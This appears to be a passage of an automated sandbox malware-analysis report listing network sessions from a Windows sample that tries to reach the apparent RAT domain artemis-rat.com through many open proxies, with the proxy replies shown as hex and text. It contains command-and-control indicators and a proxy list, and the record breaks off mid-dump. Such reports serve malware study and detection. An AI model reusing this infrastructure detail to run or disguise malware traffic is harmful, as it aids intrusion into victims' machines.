                                              424192.168.2.45138745.14.174.180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.904031992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.058356047 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              425192.168.2.451243217.23.11.194327087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.904999971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.197807074 CET226INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Length: 101
                                              Content-Type: text/plain; charset=utf-8
                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                              Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              426192.168.2.451307184.181.217.19441457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.905257940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              427192.168.2.451374184.72.36.89807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.905334949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.077805996 CET344INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: Apache
                                              Content-Length: 199
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              428192.168.2.451203171.250.221.19110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.905522108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              429192.168.2.451106111.20.217.17890917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.905798912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.464104891 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:36:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              430192.168.2.450447113.208.119.14290027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.906265020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.258080959 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              431192.168.2.45124023.137.248.197807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.906265974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.204792023 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              432192.168.2.451210165.22.96.6831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.910353899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.600560904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.794976950 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              433192.168.2.45135435.185.196.3831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.910962105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.121242046 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              434192.168.2.451427104.19.120.84807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.911237955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.065687895 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              435192.168.2.45120731.170.22.12710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.918013096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              436192.168.2.451204109.69.0.17956787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.920243979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              437192.168.2.45122965.109.163.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.923464060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.600563049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.554771900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.554148912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.460268974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366722107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.280695915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.069833040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.487225056 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              438192.168.2.451271147.75.34.85100077284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.928261995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.232475042 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              439192.168.2.451235161.97.74.176300007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.928554058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.213445902 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              440192.168.2.451356172.93.111.235435207284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.939819098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.459917068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.163295031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              441192.168.2.451234103.23.100.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.940865040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              442192.168.2.451290144.76.96.18055667284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.944535971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.252830029 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 